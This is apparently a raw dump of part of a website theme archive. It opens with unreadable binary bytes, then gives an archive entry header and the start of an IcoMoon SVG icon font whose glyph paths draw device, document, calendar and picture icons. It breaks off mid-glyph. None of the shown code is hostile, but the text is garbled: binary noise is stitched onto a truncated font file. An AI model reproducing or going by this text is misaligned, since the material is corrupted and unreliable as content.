r\��\�F����5"���w����ɩ��x��1�<�y�F��񫴊�T����I�9�j1��Hf_x�n���Ⱦ`*Nw��A#��i��w`ϟ%�/��M�t��n��5��bُ��_�9wu��5�'����ԛ��@ۤchI$��u.���8��9�ܐ�OLUo�m��4�n��$w�CF��$����;3��QUm��o;��<��W�2�,�ͺ����OὭd����h	��›���Fv�]+�hʏݮ�-^���mwa�3���f�@�^MMϿ����|^_��b�Q>���+���y��w�Q�_�@J���;Kr���o�u#�i/��k�{�%��h�k0{Ҿ���f�ïئ��
|�
OӵEGkR�jQ��m�%Z%E���C 9������Q���_���_$�J����'���B������t��M�YA�8 ��J�r�ԉF�!�k����׌�"�s6� �v �<���Ub_�V2.~܄�zش��M�;�UXЂ�q��ǥf~԰�
�UV;�B�A��\�w>p�m��7<�DO��O��[7�n�I5��|��w5�s/��Xm��.~�q��K�mB+e����D�I^O��R���
t�w�nt��4l$u���1�p7��*���Ֆ��|��q9�὎q]��t���V,�Lֱ���?ϥV�tؗJ��n�4�~����mvk]X�c�r@q�Y�v�P[�z5f�ծި�w-���v�$S/�޺�ǚI2Y��/�o�����?xV�k�y<�B�Z�d�g���Nk�ESJ�T�so���xN%W�Vr�8�}T�?��k��5�?xZ��>�����}�G^�?����$��Yv��#�z'��=�+	��?Z�2jӜ]);�k�(�T[�c�;�~��~)[X�����وR卽�*҃��i���W�_�\�+��O_�'�����V�&^"
�T0\�0��Y�H��Q��`�`s����k�V֯�i�
�{tړIq����k���c��€x�j����s�ߴ��w���Y��q���z��d�*k�($��x������AVe �k�gӥ9ap˕=��了~��O���G^|��k[]���+�V߼��h�O%�� �3-S�Y��a�g�I���"�8^=���5���s��	��kW��W�E��İm��6K@ۀ����rU��v�d��^"���d��$[&��m��������%k��'�:����ۛ[��9�9!x'x�,/.H+��#?Z���V�ł�SPh�,Wr�K(E�Ny�I�a*4�%9-WS�U\d����/��Q�ɩCu��2���c�[a]�̍���Wr�J��T~��<
ec��o�7�|l�9��
��M���q��ּ?�����
�F�I�u��6��D:�O!r6�p�/:��N�5mk�%�֥{-�͔RH�s
Ő1�u=:W]W$���U�2�=���������
;<Q���
�z��wpz�ֹ�Gj���
{��z��xp=�+��S��PK!Ic�C��bizone/fonts/icomoon.svgnu&1i�<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
<svg xmlns="http://www.w3.org/2000/svg">
<metadata>Generated by IcoMoon</metadata>
<defs>
<font id="icomoon" horiz-adv-x="1024">
<font-face units-per-em="1024" ascent="960" descent="-64" />
<missing-glyph horiz-adv-x="1024" />
<glyph unicode="&#x20;" horiz-adv-x="512" d="" />
<glyph unicode="&#xe000;" glyph-name="mobile3" d="M48-64h448c8.832 0 16 7.168 16 16s-7.168 16-16 16h-448c-8.832 0-16 7.168-16 16v928c0 8.832 7.168 16 16 16h672c8.832 0 16-7.168 16-16v-160c0-8.832 7.168-16 16-16s16 7.168 16 16v160c0 26.464-21.536 48-48 48h-672c-26.464 0-48-21.536-48-48v-928c0-26.464 21.536-48 48-48zM576 624v-640c0-26.464 21.536-48 48-48h352c26.464 0 48 21.536 48 48v640c0 26.464-21.536 48-48 48h-352c-26.464 0-48-21.536-48-48zM992 624v-640c0-8.832-7.168-16-16-16h-352c-8.832 0-16 7.168-16 16v640c0 8.832 7.168 16 16 16h352c8.832 0 16-7.168 16-16zM352 64c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM768 64c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32z" />
<glyph unicode="&#xe001;" glyph-name="laptop2" horiz-adv-x="1344" d="M112 128c8.832 0 16 7.168 16 16v752c0 19.136 12.864 32 32 32h1024c18.24 0 32-14.976 32-34.848v-749.152c0-8.832 7.168-16 16-16s16 7.168 16 16v749.152c0 37.504-28.096 66.848-64 66.848h-1024c-37.088 0-64-26.912-64-64v-752c0-8.832 7.168-16 16-16zM208 864c-8.832 0-16-7.168-16-16v-704c0-8.832 7.168-16 16-16h928c8.832 0 16 7.168 16 16v704c0 8.832-7.168 16-16 16h-928zM1120 160h-896v672h896v-672zM1328 64h-1312c-8.832 0-16-7.168-16-16v-37.6c0-38.336 45.056-74.4 80-74.4h1184c36.64 0 80 43.36 80 80v32c0 8.832-7.168 16-16 16zM1312 16c0-18.848-29.152-48-48-48h-1184c-20.192 0-48 24.576-48 42.4v21.6h1280v-16z" />
<glyph unicode="&#xe002;" glyph-name="desktop" horiz-adv-x="1248" d="M48 160h560v-48c0-8.832 7.168-16 16-16s16 7.168 16 16v48h560c26.464 0 48 21.536 48 48v704c0 26.464-21.536 48-48 48h-1152c-26.464 0-48-21.536-48-48v-704c0-26.464 21.536-48 48-48zM32 912c0 8.832 7.168 16 16 16h1152c8.832 0 16-7.168 16-16v-704c0-8.832-7.168-16-16-16h-1152c-8.832 0-16 7.168-16 16v704zM112 256h1024c8.832 0 16 7.168 16 16v576c0 8.832-7.168 16-16 16h-1024c-8.832 0-16-7.168-16-16v-576c0-8.832 7.168-16 16-16zM128 832h992v-544h-992v544zM448 64c-36.48 0-64-27.52-64-64v-48c0-8.832 7.168-16 16-16h448c8.832 0 16 7.168 16 16v45.6c0 37.216-28.096 66.4-64 66.4h-352zM832-2.4v-29.6h-416v32c0 18.848 13.152 32 32 32h352c18.24 0 32-14.784 32-34.4z" />
<glyph unicode="&#xe003;" glyph-name="tablet2" horiz-adv-x="800" d="M48-64h704c26.464 0 48 21.536 48 48v928c0 26.464-21.536 48-48 48h-704c-26.464 0-48-21.536-48-48v-928c0-26.464 21.536-48 48-48zM32 912c0 8.832 7.168 16 16 16h704c8.832 0 16-7.168 16-16v-928c0-8.832-7.168-16-16-16h-704c-8.832 0-16 7.168-16 16v928zM112 96h576c8.832 0 16 7.168 16 16v736c0 8.832-7.168 16-16 16h-576c-8.832 0-16-7.168-16-16v-736c0-8.832 7.168-16 16-16zM128 832h544v-704h-544v704zM384 32c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32z" />
<glyph unicode="&#xe004;" glyph-name="phone2" horiz-adv-x="608" d="M48-64h512c26.464 0 48 21.536 48 48v928c0 26.464-21.536 48-48 48h-512c-26.464 0-48-21.536-48-48v-928c0-26.464 21.536-48 48-48zM32 912c0 8.832 7.168 16 16 16h512c8.832 0 16-7.168 16-16v-928c0-8.832-7.168-16-16-16h-512c-8.832 0-16 7.168-16 16v928zM80 96h448c8.832 0 16 7.168 16 16v672c0 8.832-7.168 16-16 16h-448c-8.832 0-16-7.168-16-16v-672c0-8.832 7.168-16 16-16zM96 768h416v-640h-416v640zM288 32c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM240 832h128c8.832 0 16 7.168 16 16s-7.168 16-16 16h-128c-8.832 0-16-7.168-16-16s7.168-16 16-16z" />
<glyph unicode="&#xe005;" glyph-name="document" horiz-adv-x="768" d="M48-64h672c26.464 0 48 21.536 48 48v672c0 0.544-0.256 0.992-0.288 1.504-0.064 0.736-0.256 1.376-0.416 2.080-0.544 2.272-1.472 4.32-2.88 6.112-0.224 0.288-0.192 0.64-0.416 0.928l-256 288c-0.096 0.096-0.224 0.096-0.32 0.192-1.92 2.048-4.352 3.456-7.136 4.288-0.608 0.192-1.152 0.256-1.792 0.352-0.928 0.16-1.792 0.544-2.752 0.544h-448c-26.464 0-48-21.536-48-48v-928c0-26.464 21.536-48 48-48zM512 901.92l204.384-229.92h-188.384c-7.040 0-16 13.44-16 24v205.92zM32 912c0 8.832 7.2 16 16 16h432v-232c0-25.888 20.96-56 48-56h208v-656c0-8.832-7.2-16-16-16h-672c-8.96 0-16 7.040-16 16v928zM176 512h416c8.832 0 16 7.168 16 16s-7.168 16-16 16h-416c-8.832 0-16-7.168-16-16s7.168-16 16-16zM176 384h416c8.832 0 16 7.168 16 16s-7.168 16-16 16h-416c-8.832 0-16-7.168-16-16s7.168-16 16-16zM176 640h192c8.832 0 16 7.168 16 16s-7.168 16-16 16h-192c-8.832 0-16-7.168-16-16s7.168-16 16-16zM176 256h416c8.832 0 16 7.168 16 16s-7.168 16-16 16h-416c-8.832 0-16-7.168-16-16s7.168-16 16-16zM176 128h416c8.832 0 16 7.168 16 16s-7.168 16-16 16h-416c-8.832 0-16-7.168-16-16s7.168-16 16-16z" />
<glyph unicode="&#xe006;" glyph-name="documents" horiz-adv-x="1088" d="M48.384 64h575.616c26.464 0 48 21.536 48 48v608c0 0.736-0.32 1.376-0.416 2.080s-0.224 1.312-0.416 1.984c-0.736 2.752-1.92 5.312-3.904 7.264l-223.968 223.968c-1.952 1.952-4.512 3.136-7.264 3.904-0.672 0.192-1.28 0.32-1.984 0.416-0.672 0.064-1.312 0.384-2.048 0.384h-383.808c-26.56 0-48.192-21.536-48.192-48v-800c0-26.464 21.696-48 48.384-48zM448 905.376l169.376-169.376h-153.376c-8.8 0-16 7.168-16 16v153.376zM32 912c0 8.832 7.264 16 16.192 16h367.808v-176c0-26.464 21.536-48 48-48h176v-592c0-8.832-7.2-16-16-16h-575.616c-9.056 0-16.384 7.168-16.384 16v800zM144 576h384c8.832 0 16 7.168 16 16s-7.168 16-16 16h-384c-8.832 0-16-7.168-16-16s7.168-16 16-16zM144 448h384c8.832 0 16 7.168 16 16s-7.168 16-16 16h-384c-8.832 0-16-7.168-16-16s7.168-16 16-16zM144 704h160c8.832 0 16 7.168 16 16s-7.168 16-16 16h-160c-8.832 0-16-7.168-16-16s7.168-16 16-16zM144 320h384c8.832 0 16 7.168 16 16s-7.168 16-16 16h-384c-8.832 0-16-7.168-16-16s7.168-16 16-16zM144 192h384c8.832 0 16 7.168 16 16s-7.168 16-16 16h-384c-8.832 0-16-7.168-16-16s7.168-16 16-16zM688 800h144v-176c0-26.464 21.536-48 48-48h176v-592c0-8.832-7.2-16-16-16h-575.616c-9.056 0-16.384 7.168-16.384 16v32c0 8.832-7.168 16-16 16s-16-7.168-16-16v-32c0-26.464 21.696-48 48.384-48h575.616c26.464 0 48 21.536 48 48v608c0 0.736-0.32 1.376-0.416 2.080s-0.224 1.312-0.416 1.984c-0.736 2.752-1.92 5.312-3.904 7.264l-223.968 223.968c-1.952 1.984-4.544 3.168-7.296 3.904-0.672 0.192-1.248 0.288-1.952 0.384-0.672 0.096-1.312 0.416-2.048 0.416h-160c-8.832 0-16-7.168-16-16s7.168-16 16-16zM880 608c-8.8 0-16 7.168-16 16v153.376l169.376-169.376h-153.376zM752 448h192c8.832 0 16 7.168 16 16s-7.168 16-16 16h-192c-8.832 0-16-7.168-16-16s7.168-16 16-16zM752 320h192c8.832 0 16 7.168 16 16s-7.168 16-16 16h-192c-8.832 0-16-7.168-16-16s7.168-16 16-16zM752 192h192c8.832 0 16 7.168 16 16s-7.168 16-16 16h-192c-8.832 0-16-7.168-16-16s7.168-16 16-16zM752 64h192c8.832 0 16 7.168 16 16s-7.168 16-16 16h-192c-8.832 0-16-7.168-16-16s7.168-16 16-16z" />
<glyph unicode="&#xe007;" glyph-name="search2" horiz-adv-x="1056" d="M48-64h672c26.464 0 48 21.536 48 48v240c0 0.32-0.16 0.576-0.192 0.896 1.76 1.12 3.584 2.176 5.312 3.36l255.552-255.552c3.136-3.136 7.232-4.704 11.328-4.704s8.192 1.568 11.328 4.672c6.24 6.24 6.24 16.384 0 22.624l-253.216 253.216c40.448 37.984 65.888 91.776 65.888 151.488 0 73.504-38.432 138.112-96.192 175.104 0.032 0.32 0.192 0.576 0.192 0.896v80c0 0.544-0.256 0.992-0.288 1.504-0.064 0.736-0.256 1.376-0.416 2.080-0.544 2.272-1.472 4.32-2.88 6.112-0.224 0.288-0.192 0.64-0.416 0.928l-256 288c-0.096 0.096-0.224 0.096-0.32 0.192-1.92 2.080-4.384 3.456-7.136 4.288-0.608 0.192-1.152 0.256-1.792 0.352-0.928 0.16-1.792 0.544-2.752 0.544h-448c-26.464 0-48-21.536-48-48v-928c0-26.464 21.536-48 48-48zM832 400c0-97.056-78.976-176-176-176s-176 78.944-176 176 78.976 176 176 176 176-78.944 176-176zM512 901.92l204.384-229.92h-188.384c-7.040 0-16 13.44-16 24v205.92zM32 912c0 8.832 7.2 16 16 16h432v-232c0-25.888 20.96-56 48-56h208v-48.032c-24.64 10.304-51.648 16.032-80 16.032-58.816 0-111.872-24.64-149.728-64h-330.272c-8.832 0-16-7.168-16-16s7.168-16 16-16h305.024c-18.080-28.128-29.504-60.832-32.192-96h-272.832c-8.832 0-16-7.168-16-16s7.168-16 16-16h272.8c2.688-35.168 14.144-67.872 32.192-96h-304.992c-8.832 0-16-7.168-16-16s7.168-16 16-16h328c0.672 0 1.248 0.288 1.92 0.384 37.888-39.584 91.104-64.384 150.080-64.384 28.352 0 55.36 5.728 80 16.064v-224.064c0-8.832-7.2-16-16-16h-672c-8.96 0-16 7.040-16 16v928zM176 640h192c8.832 0 16 7.168 16 16s-7.168 16-16 16h-192c-8.832 0-16-7.168-16-16s7.168-16 16-16zM176 128h416c8.832 0 16 7.168 16 16s-7.168 16-16 16h-416c-8.832 0-16-7.168-16-16s7.168-16 16-16z" />
<glyph unicode="&#xe008;" glyph-name="clipboard2" horiz-adv-x="896" d="M48-64h800c27.808 0 48 20.192 48 48v896c0 27.808-20.192 48-48 48h-128c-8.832 0-16-7.168-16-16s7.168-16 16-16h128c10.016 0 16-5.984 16-16v-896c0-10.016-5.984-16-16-16h-800c-10.016 0-16 5.984-16 16v896c0 10.016 5.984 16 16 16h128c8.832 0 16 7.168 16 16s-7.168 16-16 16h-128c-27.808 0-48-20.192-48-48v-896c0-27.808 20.192-48 48-48zM176 800c8.832 0 16 7.168 16 16s-7.168 16-16 16h-64c-8.832 0-16-7.168-16-16v-768c0-8.832 7.168-16 16-16h672c8.832 0 16 7.168 16 16v768c0 8.832-7.168 16-16 16h-64c-8.832 0-16-7.168-16-16s7.168-16 16-16h48v-736h-640v736h48zM288 736h320c38.88 0 64 25.12 64 64v144c0 8.832-7.168 16-16 16h-416c-8.832 0-16-7.168-16-16v-144c0-38.88 25.12-64 64-64zM256 928h384v-128c0-21.248-10.784-32-32-32h-320c-21.216 0-32 10.752-32 32v128zM272 448h352c8.832 0 16 7.168 16 16s-7.168 16-16 16h-352c-8.832 0-16-7.168-16-16s7.168-16 16-16zM272 576h352c8.832 0 16 7.168 16 16s-7.168 16-16 16h-352c-8.832 0-16-7.168-16-16s7.168-16 16-16zM272 320h352c8.832 0 16 7.168 16 16s-7.168 16-16 16h-352c-8.832 0-16-7.168-16-16s7.168-16 16-16zM272 192h352c8.832 0 16 7.168 16 16s-7.168 16-16 16h-352c-8.832 0-16-7.168-16-16s7.168-16 16-16z" />
<glyph unicode="&#xe009;" glyph-name="newspaper2" horiz-adv-x="1344" d="M1184 32c38.272 0 64 25.728 64 64v848c0 8.832-7.168 16-16 16s-16-7.168-16-16v-848c0-27.84-20.064-32-32-32-3.296 0-32 0.896-32 32v848c0 8.832-7.168 16-16 16s-16-7.168-16-16v-848c0-42.016 32.192-64 64-64zM144 288h320c8.832 0 16 7.168 16 16v288c0 8.832-7.168 16-16 16h-320c-8.832 0-16-7.168-16-16v-288c0-8.832 7.168-16 16-16zM160 576h288v-256h-288v256zM144 704h768c8.832 0 16 7.168 16 16v128c0 8.832-7.168 16-16 16h-768c-8.832 0-16-7.168-16-16v-128c0-8.832 7.168-16 16-16zM160 832h736v-96h-736v96zM912 608h-320c-8.832 0-16-7.168-16-16s7.168-16 16-16h320c8.832 0 16 7.168 16 16s-7.168 16-16 16zM912 512h-320c-8.832 0-16-7.168-16-16s7.168-16 16-16h320c8.832 0 16 7.168 16 16s-7.168 16-16 16zM912 416h-320c-8.832 0-16-7.168-16-16s7.168-16 16-16h320c8.832 0 16 7.168 16 16s-7.168 16-16 16zM912 320h-320c-8.832 0-16-7.168-16-16s7.168-16 16-16h320c8.832 0 16 7.168 16 16s-7.168 16-16 16zM912 224h-320c-8.832 0-16-7.168-16-16s7.168-16 16-16h320c8.832 0 16 7.168 16 16s-7.168 16-16 16zM144 192h320c8.832 0 16 7.168 16 16s-7.168 16-16 16h-320c-8.832 0-16-7.168-16-16s7.168-16 16-16zM912 128h-320c-8.832 0-16-7.168-16-16s7.168-16 16-16h320c8.832 0 16 7.168 16 16s-7.168 16-16 16zM144 96h320c8.832 0 16 7.168 16 16s-7.168 16-16 16h-320c-8.832 0-16-7.168-16-16s7.168-16 16-16zM160-62.304h1024c0.256 0 0.512 0 0.64 0 0.224 0 0.416 0.128 0.64 0.128 86.688 0.704 157.056 71.328 157.056 158.176v848c0 7.904-6.4 14.304-14.304 14.304s-14.304-6.4-14.304-14.304v-848c0-71.52-58.176-129.696-129.696-129.696s-129.728 58.176-129.728 129.696v848c0 7.904-6.4 14.304-14.304 14.304h-1024c-7.904 0-14.304-6.4-14.304-14.304v-848c0-87.296 71.008-158.304 158.304-158.304zM30.304 929.696h995.36v-833.696c0-9.792 1.184-19.296 2.88-28.64 0.352-1.856 0.64-3.712 1.056-5.536 1.984-8.896 4.608-17.504 8.032-25.792 0.608-1.504 1.344-2.912 2.016-4.384 3.456-7.744 7.456-15.2 12.096-22.24 0.544-0.8 0.96-1.664 1.504-2.464 5.056-7.36 10.816-14.176 16.992-20.576 1.344-1.376 2.656-2.72 4.064-4.064 5.952-5.76 12.224-11.232 19.008-16h-933.312c-71.488 0-129.696 58.176-129.696 129.696v833.696z" />
<glyph unicode="&#xe00a;" glyph-name="notebook" horiz-adv-x="864" d="M752-64c27.808 0 48 20.192 48 48v896c0 27.808-20.192 48-48 48h-640c-27.808 0-48-20.192-48-48v-37.344c0-8.832 7.168-16 16-16s16 7.168 16 16v37.344c0 10.016 5.984 16 16 16h145.984v-928h-145.984c-10.016 0-16 5.984-16 16v29.344c0 8.832-7.168 16-16 16s-16-7.168-16-16v-29.344c0-27.808 20.192-48 48-48h640zM288 896h464c10.016 0 16-5.984 16-16v-896c0-10.016-5.984-16-16-16h-464v928zM864 16v832c0 8.832-7.168 16-16 16s-16-7.168-16-16v-832c0-8.832 7.168-16 16-16s16 7.168 16 16zM16 608h128c8.832 0 16 7.168 16 16s-7.168 16-16 16h-128c-8.832 0-16-7.168-16-16s7.168-16 16-16zM16 736h128c8.832 0 16 7.168 16 16s-7.168 16-16 16h-128c-8.832 0-16-7.168-16-16s7.168-16 16-16zM16 480h128c8.832 0 16 7.168 16 16s-7.168 16-16 16h-128c-8.832 0-16-7.168-16-16s7.168-16 16-16zM16 224h128c8.832 0 16 7.168 16 16s-7.168 16-16 16h-128c-8.832 0-16-7.168-16-16s7.168-16 16-16zM16 352h128c8.832 0 16 7.168 16 16s-7.168 16-16 16h-128c-8.832 0-16-7.168-16-16s7.168-16 16-16zM16 96h128c8.832 0 16 7.168 16 16s-7.168 16-16 16h-128c-8.832 0-16-7.168-16-16s7.168-16 16-16z" />
<glyph unicode="&#xe00b;" glyph-name="book-open" horiz-adv-x="1344" d="M1200 928h-512c-12.704 0-23.68-4.352-32-11.584-8.32 7.232-19.296 11.584-32 11.584h-512c-27.808 0-48-20.192-48-48v-896c0-27.808 20.192-48 48-48h512c12.704 0 23.68 4.352 32 11.584 8.32-7.232 19.296-11.584 32-11.584h512c27.808 0 48 20.192 48 48v896c0 27.808-20.192 48-48 48zM624-32h-512c-10.016 0-16 5.984-16 16v896c0 10.016 5.984 16 16 16h512c10.016 0 16-5.984 16-16v-896c0-10.016-5.984-16-16-16zM1216-16c0-10.016-5.984-16-16-16h-512c-10.016 0-16 5.984-16 16v896c0 10.016 5.984 16 16 16h512c10.016 0 16-5.984 16-16v-896zM1296 864c-8.832 0-16-7.168-16-16v-832c0-8.832 7.168-16 16-16s16 7.168 16 16v832c0 8.832-7.168 16-16 16zM16 0c8.832 0 16 7.168 16 16v832c0 8.832-7.168 16-16 16s-16-7.168-16-16v-832c0-8.832 7.168-16 16-16zM560 640h-384c-8.832 0-16-7.168-16-16s7.168-16 16-16h384c8.832 0 16 7.168 16 16s-7.168 16-16 16zM560 512h-384c-8.832 0-16-7.168-16-16s7.168-16 16-16h384c8.832 0 16 7.168 16 16s-7.168 16-16 16zM560 768h-384c-8.832 0-16-7.168-16-16s7.168-16 16-16h384c8.832 0 16 7.168 16 16s-7.168 16-16 16zM560 384h-384c-8.832 0-16-7.168-16-16s7.168-16 16-16h384c8.832 0 16 7.168 16 16s-7.168 16-16 16zM560 256h-384c-8.832 0-16-7.168-16-16s7.168-16 16-16h384c8.832 0 16 7.168 16 16s-7.168 16-16 16zM560 128h-384c-8.832 0-16-7.168-16-16s7.168-16 16-16h384c8.832 0 16 7.168 16 16s-7.168 16-16 16zM1136 640h-384c-8.832 0-16-7.168-16-16s7.168-16 16-16h384c8.832 0 16 7.168 16 16s-7.168 16-16 16zM1136 512h-384c-8.832 0-16-7.168-16-16s7.168-16 16-16h384c8.832 0 16 7.168 16 16s-7.168 16-16 16zM1136 768h-384c-8.832 0-16-7.168-16-16s7.168-16 16-16h384c8.832 0 16 7.168 16 16s-7.168 16-16 16zM1136 384h-384c-8.832 0-16-7.168-16-16s7.168-16 16-16h384c8.832 0 16 7.168 16 16s-7.168 16-16 16zM1136 256h-384c-8.832 0-16-7.168-16-16s7.168-16 16-16h384c8.832 0 16 7.168 16 16s-7.168 16-16 16zM1136 128h-384c-8.832 0-16-7.168-16-16s7.168-16 16-16h384c8.832 0 16 7.168 16 16s-7.168 16-16 16z" />
<glyph unicode="&#xe00c;" glyph-name="browser" horiz-adv-x="1344" d="M1328 640c-8.832 0-16-7.168-16-16v-640c0-8.832-7.168-16-16-16h-1248c-8.832 0-16 7.168-16 16v640c0 8.832-7.168 16-16 16s-16-7.168-16-16v-640c0-26.464 21.536-48 48-48h1248c26.464 0 48 21.536 48 48v640c0 8.832-7.168 16-16 16zM1296 960h-1248c-26.464 0-48-21.536-48-48v-192c0-8.832 7.168-16 16-16h1312c8.832 0 16 7.168 16 16v192c0 26.464-21.536 48-48 48zM1312 736h-1280v176c0 8.832 7.168 16 16 16h1248c8.832 0 16-7.168 16-16v-176zM560 64c8.832 0 16 7.168 16 16v512c0 8.832-7.168 16-16 16h-416c-8.832 0-16-7.168-16-16v-512c0-8.832 7.168-16 16-16h416zM160 576h384v-480h-384v480zM720 480h480c8.832 0 16 7.168 16 16s-7.168 16-16 16h-480c-8.832 0-16-7.168-16-16s7.168-16 16-16zM720 320h480c8.832 0 16 7.168 16 16s-7.168 16-16 16h-480c-8.832 0-16-7.168-16-16s7.168-16 16-16zM720 160h480c8.832 0 16 7.168 16 16s-7.168 16-16 16h-480c-8.832 0-16-7.168-16-16s7.168-16 16-16zM96 832c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM224 832c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM352 832c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32z" />
<glyph unicode="&#xe00d;" glyph-name="calendar2" horiz-adv-x="1088" d="M1088-16v608c0 8.832-7.168 16-16 16s-16-7.168-16-16v-608c0-8.832-7.168-16-16-16h-992c-8.832 0-16 7.168-16 16v608c0 8.832-7.168 16-16 16s-16-7.168-16-16v-608c0-26.464 21.536-48 48-48h992c26.464 0 48 21.536 48 48zM144 224c-8.832 0-16-7.168-16-16s7.168-16 16-16h48v-112c0-8.832 7.168-16 16-16s16 7.168 16 16v112h192v-112c0-8.832 7.168-16 16-16s16 7.168 16 16v112h192v-112c0-8.832 7.168-16 16-16s16 7.168 16 16v112h192v-112c0-8.832 7.168-16 16-16s16 7.168 16 16v112h48c8.832 0 16 7.168 16 16s-7.168 16-16 16h-48v160h48c8.832 0 16 7.168 16 16s-7.168 16-16 16h-48v144c0 8.832-7.168 16-16 16s-16-7.168-16-16v-144h-192v144c0 8.832-7.168 16-16 16s-16-7.168-16-16v-144h-192v144c0 8.832-7.168 16-16 16s-16-7.168-16-16v-144h-192v144c0 8.832-7.168 16-16 16s-16-7.168-16-16v-144h-48c-8.832 0-16-7.168-16-16s7.168-16 16-16h48v-160h-48zM864 384v-160h-192v160h192zM640 384v-160h-192v160h192zM224 384h192v-160h-192v160zM912 864h136c2.784 0 8 0 8-16v-144h-1024v144c0 8.832 7.168 16 16 16h128c8.832 0 16 7.168 16 16s-7.168 16-16 16h-128c-26.464 0-48-21.536-48-48v-160c0-8.832 7.168-16 16-16h1056c8.832 0 16 7.168 16 16v160c0 35.392-20.672 48-40 48h-136c-8.832 0-16-7.168-16-16s7.168-16 16-16zM720 864c8.832 0 16 7.168 16 16s-7.168 16-16 16h-352c-8.832 0-16-7.168-16-16s7.168-16 16-16h352zM288 816v128c0 8.832-7.168 16-16 16s-16-7.168-16-16v-128c0-8.832 7.168-16 16-16s16 7.168 16 16zM816 800c8.832 0 16 7.168 16 16v128c0 8.832-7.168 16-16 16s-16-7.168-16-16v-128c0-8.832 7.168-16 16-16z" />
<glyph unicode="&#xe00e;" glyph-name="presentation" horiz-adv-x="992" d="M16 864c-8.832 0-16-7.168-16-16v-544c0-26.464 21.536-48 48-48h896c26.464 0 48 21.536 48 48v544c0 8.832-7.168 16-16 16s-16-7.168-16-16v-544c0-8.832-7.168-16-16-16h-896c-8.832 0-16 7.168-16 16v544c0 8.832-7.168 16-16 16zM1040 960h-1088c-8.832 0-16-7.168-16-16s7.168-16 16-16h1088c8.832 0 16 7.168 16 16s-7.168 16-16 16zM379.328 699.328c-5.856 5.856-15.2 6.272-21.568 0.992l-192-160c-6.784-5.664-7.712-15.744-2.048-22.56 5.664-6.784 15.712-7.712 22.56-2.048l180.768 150.656 181.664-181.664c3.104-3.136 7.2-4.704 11.296-4.704s8.192 1.568 11.328 4.672l228.672 228.704v-121.376c0-8.832 7.168-16 16-16s16 7.168 16 16v160c0 2.080-0.416 4.16-1.216 6.112-1.632 3.904-4.736 7.040-8.672 8.672-1.952 0.8-4.032 1.216-6.112 1.216h-160c-8.832 0-16-7.168-16-16s7.168-16 16-16h121.376l-217.376-217.376-180.672 180.704zM257.824-55.424c4.096-7.84 13.76-10.848 21.6-6.752l216.576 113.44 216.576-113.44c2.368-1.248 4.896-1.824 7.424-1.824 5.76 0 11.328 3.136 14.176 8.576 4.096 7.84 1.088 17.504-6.752 21.6l-220.576 115.52c3.136 2.912 5.152 7.008 5.152 11.648v82.656c0 8.832-7.168 16-16 16s-16-7.168-16-16v-82.656c0-4.608 2.016-8.704 5.152-11.616l-220.576-115.52c-7.84-4.128-10.848-13.792-6.752-21.632z" />
<glyph unicode="&#xe00f;" glyph-name="picture" d="M48-64h928c26.464 0 48 21.536 48 48v928c0 26.464-21.536 48-48 48h-928c-26.464 0-48-21.536-48-48v-928c0-26.464 21.536-48 48-48zM32 912c0 8.832 7.2 16 16 16h928c8.8 0 16-7.168 16-16v-928c0-8.832-7.2-16-16-16h-928c-8.8 0-16 7.168-16 16v928zM656 560c35.296 0 64 28.704 64 64s-28.704 64-64 64-64-28.704-64-64 28.704-64 64-64zM656 656c17.664 0 32-14.368 32-32s-14.336-32-32-32-32 14.368-32 32 14.336 32 32 32zM144 160h736c8.832 0 16 7.168 16 16v640c0 8.832-7.168 16-16 16h-736c-8.832 0-16-7.168-16-16v-640c0-8.832 7.168-16 16-16zM160 192v180.416c0.704 0.512 1.504 0.8 2.144 1.44l163.712 163.712c8.32 8.32 22.784 8.288 31.104 0l240.672-240.672c3.136-3.136 7.232-4.672 11.328-4.672 3.968 0 7.936 1.472 11.040 4.416l123.712 117.504c4.16 4.16 9.696 6.464 15.552 6.464 5.888 0 11.36-2.304 15.072-5.984l89.664-97.664c0 0 0.032 0 0.032-0.032v-124.928h-704.032zM864 800v-435.776l-66.592 72.512c-10.144 10.208-23.712 15.84-38.112 15.84-0.032 0-0.032 0-0.032 0-14.432 0-28-5.632-37.92-15.552l-112.128-106.496-229.632 229.664c-20.448 20.416-55.968 20.384-76.352 0l-143.232-143.264v383.072h704z" />
<glyph unicode="&#xe010;" glyph-name="pictures" horiz-adv-x="1056" d="M48 64h832c26.464 0 48 21.536 48 48v800c0 26.464-21.536 48-48 48h-832c-26.464 0-48-21.536-48-48v-800c0-26.464 21.536-48 48-48zM32 912c0 8.832 7.2 16 16 16h832c8.8 0 16-7.168 16-16v-800c0-8.832-7.2-16-16-16h-832c-8.8 0-16 7.168-16 16v800zM576 608c35.296 0 64 28.704 64 64s-28.704 64-64 64-64-28.704-64-64 28.704-64 64-64zM576 704c17.664 0 32-14.368 32-32s-14.336-32-32-32-32 14.368-32 32 14.336 32 32 32zM112 224h704c8.832 0 16 7.168 16 16v608c0 8.832-7.168 16-16 16h-704c-8.832 0-16-7.168-16-16v-608c0-8.832 7.168-16 16-16zM128 256v148.416c0.704 0.512 1.504 0.8 2.144 1.44l163.712 163.712c8.32 8.32 22.784 8.288 31.104 0l240.672-240.672c3.136-3.136 7.232-4.672 11.328-4.672 3.968 0 7.936 1.472 11.040 4.416l123.712 117.504c4.16 4.16 9.696 6.464 15.552 6.464 5.888 0 11.36-2.304 14.848-5.696l57.888-65.888v-125.024h-672zM800 832v-402.592l-34.592 39.296c-10.144 10.208-23.712 15.84-38.112 15.84-0.032 0-0.032 0-0.032 0-14.432 0-28-5.632-37.92-15.552l-112.128-106.496-229.632 229.664c-20.448 20.416-55.968 20.384-76.352 0l-143.232-143.232v383.072h672zM144 29.344c-8.832 0-16-7.168-16-16v-29.344c0-26.464 21.536-48 48-48h832c26.464 0 48 21.536 48 48v832c0 26.464-21.536 48-48 